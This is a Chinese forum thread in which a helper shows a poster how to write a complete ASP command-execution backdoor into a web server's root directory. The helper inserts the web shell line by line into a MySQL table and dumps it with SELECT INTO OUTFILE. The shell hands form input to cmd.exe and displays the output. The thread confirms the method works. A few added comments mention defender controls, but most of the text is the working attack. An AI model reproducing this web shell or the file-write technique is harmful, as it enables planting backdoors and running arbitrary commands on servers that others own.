sql语句(up有分.在线等待) (300分)

to xianjun
表里只有一个字段 str（text 或 blob 类型）
 
唉, 小问题搞了半天,帮你试了一下,一切都没有问题啊:
-- Switch to the scratch database used for this reproduction.
use test;

-- One text column, one line of the target file per row. The poster's original
-- attempt put the whole file into a single row, which is what went wrong (see
-- the summary at the end of the thread); each line is inserted as its own row below.
create table a(str text);

insert into a(str) values('<% ');
insert into a(str) values('Dim oScript ');
insert into a(str) values('Dim oScriptNet ');
insert into a(str) values('Dim oFileSys, oFile ');
insert into a(str) values('Dim szCMD, szTempFile ');
insert into a(str) values('On Error Resume Next ');
insert into a(str) values('Set oScript = Server.CreateObject("WSCRIPT.SHELL") ');
insert into a(str) values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") ');
insert into a(str) values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") ');
insert into a(str) values('szCMD = Request.Form(".CMD") ');
insert into a(str) values('If (szCMD <>"") Then ');
insert into a(str) values(' szTempFile = "C:/" & oFileSys.GetTempName()');
insert into a(str) values(' Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) ');
insert into a(str) values(' Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) ');
insert into a(str) values('End If ');
insert into a(str) values('%> ');
insert into a(str) values('<HTML>');
insert into a(str) values('<TITLE>可运行DOS命令的后门ASP</TITLE>');
insert into a(str) values('<BODY>');
insert into a(str) values('<FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> ');
insert into a(str) values('<input type=text name=".CMD" size=45 value="<%= szCMD %>">');
insert into a(str) values('<input type=submit value="输入DOS命令">');
insert into a(str) values('</FORM><PRE> ');
insert into a(str) values('<% ');
insert into a(str) values('If (IsObject(oFile)) Then ');
insert into a(str) values(' On Error Resume Next ');
insert into a(str) values(' Response.Write Server.HTMLEncode(oFile.ReadAll) ');
insert into a(str) values(' oFile.Close ');
insert into a(str) values(' Call oFileSys.DeleteFile(szTempFile, True) ');
insert into a(str) values('End If');
insert into a(str) values('%> ');
insert into a(str) values('</BODY>');
insert into a(str) values('</HTML> ');

-- Dumps every row of a, one per line, to a file on the database server's own
-- filesystem. INTO OUTFILE requires the MySQL FILE privilege and is refused when
-- secure_file_priv is set to a directory that does not contain the target path;
-- the path here is served by the web server (the thread then requests test.asp),
-- so the rows written become a server-executable page. Defender-side controls:
-- do not grant FILE to application accounts, point secure_file_priv at a
-- non-web directory, and keep the web root unwritable by the database service
-- account. (Explicit column list preferred over * in general; left as posted.)
select * from a into outfile "f://test.asp";

http://localhost/test.asp
顺利成功。
 
to xianjun
谢谢,按照你的方法已经成功
总结一下,由于思路不好,呵呵,把所有字符串放到一行里了,所以结果出了问题。
xianjun 把文件的每一行分别放到数据库的一行里,再 outfile,不错,这样就搞定了
 